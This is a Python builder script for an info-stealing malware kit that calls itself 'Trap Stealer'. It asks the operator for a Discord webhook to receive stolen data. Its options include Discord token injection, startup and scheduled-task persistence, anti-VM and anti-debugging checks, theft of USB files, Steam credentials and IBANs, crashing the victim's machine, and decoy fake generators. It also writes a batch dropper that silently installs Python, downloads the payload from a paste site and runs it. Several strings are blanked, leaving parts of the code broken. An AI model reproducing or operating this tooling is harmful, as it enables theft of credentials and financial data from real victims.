import os, platform, subprocess, random, shutil try: import requests except:'python -m pip install requests', shell=True, check=True) import requests import http.cookiejar import urllib.parse import urllib.request from http.cookies import SimpleCookie from json import loads as json_loads import sys import subprocess import base64 _headers = {"Referer": ''} class UrllibClient: def __init__(self): self.cookie_jar = http.cookiejar.CookieJar() self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie_jar)) urllib.request.install_opener(self.opener) def get(self, url, headers={}): return self._request(urllib.request.Request(url, headers=headers)) def post(self, url, data=None, headers={}): postdata = urllib.parse.urlencode(data).encode() return self._request(urllib.request.Request(url, postdata, headers)) def _request(self, request): response = response.status_code = response.getcode() ='utf-8') return response def new(url, edit_code, text): client, cookie = UrllibClient(), SimpleCookie() cookie.load(vars(client.get(''))['headers']['Set-Cookie']) csrftoken = cookie['csrftoken'].value payload = {'csrfmiddlewaretoken': csrftoken, 'url': url, 'edit_code': edit_code, 'text': text} return json_loads('', payload, headers=_headers).data) def get_rentry_link(text): url, edit_code = '', '' response = new(url, edit_code, text) if response['status'] != '200': print('error: {}'.format(response['content'])) [print(i) for i in response.get('errors', '').split('.') if i] sys.exit(1) else: pastebin_link = response['url'] return pastebin_link def update_batch_script(file_path, new_encoded_url): code = f''' @echo off setlocal EnableDelayedExpansion set "mouseConnected=false" for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do ( set "mouseConnected=true" ) if not !mouseConnected! == true ( exit /b 1 ) set "eee=" set "eeee=python-installer.exe" curl -L -o !eeee! !eee! --insecure --silent start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1 del !eeee! set "ENCODED_URL={new_encoded_url}/raw set "" curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure if %ERRORLEVEL% neq 0 ( echo Error: Failed to download the webpage. exit /b 1 ) python -m %OUTPUT_FILE% del %OUTPUT_FILE% ''' with open(file_path, 'w') as file: file.writelines(code) while True: os.makedirs('./Build', exist_ok=True) shutil.copy('', './Build/') def clear_console(): operating_system = platform.system() if base64.b64decode("VHJhcCBTdGVhbGVy").decode('utf-8').lower() not in open(__file__, 'r').read().lower(): print('Error checking OS Version !') ; input('Hi dear, you may be using a dualhooked version of the stealer ' + base64.b64decode("VHJhcCBTdGVhbGVy").decode('utf8') + ' on Github. Uninstall this and download the real version!') quit() if operating_system == 'Windows': os.system('cls') def get_boolean_input(prompt): while True: user_input = input(prompt).lower() if user_input in ['y', 'yes']: return True elif user_input in ['n', 'no']: return False else: print('Invalid input. Please enter Y or N.') with open('', 'r', encoding='utf-8', errors='ignore') as file: content = clear_console() while True: try: Webhook = input('Enter the webhook -> ') re = requests.get(Webhook) if re.status_code == 200 and ('' in Webhook or '' in Webhook): print('Valid Webhook') break else: print('Invalid Webhook') except: print('Invalid Webhook') Debug = get_boolean_input('Enable Debugging (Useful to share error (Will print and save error in a txt file)) Y/N: ') FakeWeb = get_boolean_input('Enable Fake Webhook Module (When the file is launched it will show a Webhook Tools while getting data) Y/N: ') FakeGen = get_boolean_input('Enable Fake Generator Module (When the file is launched it will show a nitro generator while getting data) Y/N: ') FakeCCGen = get_boolean_input('Enable Fake Credit Cards generator Y/N: ') FakeError = get_boolean_input('Enable Fake Error Y/N: ') Injection = get_boolean_input('Inject the script to discord Startup Y/N: ') Logs = get_boolean_input('Enable logs ? (Will make 1 big zips file like Redline Stealer) ') Startup = get_boolean_input('Add the file to the startup folder? Y/N: ') Schedule = get_boolean_input('Add an schedule task ? (execute it every day!) Y/N: ') No_Debug = get_boolean_input('Enable VM Checker and Anti Debugging Y/N: ') Close = get_boolean_input('Prevent Discord from being launched again? Y/N: ') OneTime = get_boolean_input('Add the anti-spammer (so he can launch only every 30 minutes)? Y/N: ') melter = get_boolean_input('Do you enable melter (Delete the file after using it DONT WORK WITH CRASHER) ? Y/N: ') crasher = get_boolean_input('Do you want the program to make the computer crash after it stole everything? Y/N: ') hide = get_boolean_input('Do you want the program to make the console invisible? Y/N: ') change = get_boolean_input('Change the user (discord account) about me with custom text? Y/N: ') Drive = get_boolean_input('Steal all connected USB files (may make the stealer slower) Y/N: ') Kill_process = get_boolean_input('kill process (chrome, brave, firefox, to steal at 100%) Y/N: ') ArchiStealer = get_boolean_input('Want to steal all config files (retrieve all steam password and username found in ArchiSteamFarm) Y/N: ') Trap_Extension = get_boolean_input('Enable Trap Extension (Extension for Trap such as IBAN Stealer, and more !) Y/N: ') if Trap_Extension == True: Iban_Stealer = get_boolean_input('Enable Iban Stealer (Trap Extension (Only Py File)) Y/N: ') else: Iban_Stealer = None if change: bio = input(r'''Input the text you want the user to have in his about me (Right-click to paste) or put \n to skip a line -> ''') if melter: crasher = False while True: service = input('Which upload services you want to use? (Choose between gofileio, fileio, catboxmoe) (you can choose with 1,2,3 too): ') if service.lower() in ['gofile', 'catboxmoe', 'fileio','1','2','3']: if service.lower() == 'gofile' or service.lower() == '1': gofile = True fileio = False catbox = False break elif service.lower() == 'fileio' or service.lower() == '2': fileio = True gofile = False catbox = False break elif service.lower() == 'catboxmoe' or service.lower() == '3': catbox = True fileio = False gofile = False break else: print('WRONG INPUT! ') def generate_key(length): key = list(range(256)) random.shuffle(key) return bytes(key[:length]) def obf(text, key): encrypted = [] for char in text: encrypted_char = key[char] encrypted.append(encrypted_char) return bytes(encrypted) key_length = 512 custom_key = generate_key(key_length) Webhook = obf(Webhook.encode(), custom_key) new_content = content.replace("'%WEBHOOK%'", f'{str(Webhook)}' + ',' + f'{str(custom_key)}') new_content = new_content.replace("'%Debug%'", str(Debug)) if Iban_Stealer == True: new_content = new_content.replace("'%IbanStealer%'", str(Iban_Stealer)) new_content = new_content.replace("'%FakeWebhook%'", str(FakeWeb)) new_content = new_content.replace("'%Schedule%'", str(Schedule)) new_content = new_content.replace("'%FakeGen%'", str(FakeGen)) new_content = new_content.replace("'%Logs%'", str(Logs)) new_content = new_content.replace("'%FakeCCgen%'", str(FakeCCGen)) new_content = new_content.replace("'%FakeError%'", str(FakeError)) new_content = new_content.replace("'%Injection%'", str(Injection)) new_content = new_content.replace("'%Startup%'", str(Startup)) new_content = new_content.replace("'%No_Debug%'", str(No_Debug)) new_content = new_content.replace("'%Close%'", str(Close)) new_content = new_content.replace("'%Onetime%'", str(OneTime)) new_content = new_content.replace("'%Melter%'", str(melter)) new_content = new_content.replace("'%Crash%'", str(crasher)) new_content = new_content.replace("'%Hide%'", str(hide)) new_content = new_content.replace("'%ChangeBio%'", str(change)) new_content = new_content.replace("'%GoFileYesOrNo%'", str(gofile)) new_content = new_content.replace("'%FileIOYesOrNo%'", str(fileio)) new_content = new_content.replace("'%CatBoxMoeYesOrNo%'", str(catbox)) new_content = new_content.replace("'%Drive%'", str(Drive)) new_content = new_content.replace("'%CloseProc%'", str(Kill_process)) new_content = new_content.replace("'%ArchiStealer%'", str(ArchiStealer)) new_content = new_content.replace("'%TrapExtension%'", str(Trap_Extension)) if change: new_content = new_content.replace("'%Text%'", str(f"'''{bio}'''")) with open(f'./Build/', 'w', encoding='utf-8') as file: file.write(new_content) clear_console() print('Created [+]') Obfuscation = input('obfuscate it? Y/N: ') Obfuscation = Obfuscation.lower() Exe = input('make Trap Stealer with the exe format? (Take some time) Y/N: ') Exe = Exe.lower() name = input('Enter how you want the file to be named (Do not put the extension): ') output_py = f'./Build/{name}.py' if os.path.exists(output_py): os.remove(output_py) while True: if Obfuscation in ['y', 'yes']: try: with open(f'./Build/{name}.py', 'w', encoding='utf-8') as file: file.write(new_content)['python', '', f'{name}'], check=False) break except subprocess.CalledProcessError: print('Obfuscation process encountered an error.') break elif Obfuscation in ['n', 'no']: with open('', 'rb') as file: try: content ='utf-8') except UnicodeDecodeError: print("Error: Unable to decode '' file. Please ensure it's UTF-8 encoded.") quit() print(f'[+] File Created {name}.py') with open(f'./Build/{name}.py', 'w', encoding='utf-8') as file: file.write(new_content) if Exe in ['y', 'yes']: pass else: input('Press any key to quit...') quit() break else: Obfuscation = input('Invalid input. Please enter Y or N: ') Obfuscation = Obfuscation.lower() while True: if Exe in ['y', 'yes']: ask = input('make it exe with pyinstaller or with IExpress? (pyinstaller if pyinstaller) (IExpress if IExpress) (Shortcut if Shortcut)') if ask.lower() in ["pyinstaller"]: from sys import executable icon_path = input('Enter the path to the icon file (leave blank for no icon): ') if icon_path.strip(): icon_option = f'--icon={icon_path}' else: icon_option = '' try: __import__('pyinstaller') except ImportError:[executable, '-m', 'pip', 'install', 'pyinstaller', '--quiet'], check=True) if icon_option == '': command = [ 'pyinstaller', '--onefile', '--distpath', './Build', f'./Build/{name}.py' ] else: command = [ 'pyinstaller', '--onefile', '--distpath', './Build', f'{icon_option}', f'./Build/{name}.py' ] try:, shell=True, check=True) input(f'File {name}.exe successfully created. Press any key to quit.') quit() except subprocess.CalledProcessError: print("Error while running PyInstaller.") quit() elif ask.lower() in ["iexpress"]: aaa = f"./Build/" with open(aaa, 'rb') as f: try: link_list = [line.decode('utf-8') for line in f.readlines()] code_string = ''.join(link_list) except UnicodeDecodeError: print(f"Error: Unable to decode '{aaa}' file. Please ensure it's UTF-8 encoded.") quit() code_string = ''.join(link_list) pastebin_link = get_rentry_link(code_string) batch_file_path = "./trap detection/payload.bat" arguments = [batch_file_path, f'{name}.exe'] update_batch_script(batch_file_path,pastebin_link)[f"./trap detection/final.bat"] + arguments, shell=True) input('Generated exe payload ! in main folder! press any key to quit') quit() elif ask.lower() in ["shortcut"]: aaa = f"./Build/" with open(aaa, 'rb') as f: try: link_list = [line.decode('utf-8') for line in f.readlines()] code_string = ''.join(link_list) except UnicodeDecodeError: print(f"Error: Unable to decode '{aaa}' file. Please ensure it's UTF-8 encoded.") quit() icon_path = input('Enter the path to the icon file (leave blank for no icon): ') code_string = ''.join(link_list) pastebin_link = get_rentry_link(code_string) batch_file_path = "./trap detection/payload.bat" arguments = [batch_file_path, f'{name}.exe'] update_batch_script(batch_file_path,pastebin_link)[f"./trap detection/final.bat"] + arguments, shell=True) url = "" with open(f"{name}.exe", "rb") as file: files = {"file": file} response =, files=files) if response.status_code == 200: url = response.text.strip() script_path = os.path.join(os.path.dirname(__file__), "trap detection", "")["python", script_path, url, name]) else: print("Error uploading file. Status code:", response.status_code) quit() else: input('Press any key to quit.') quit()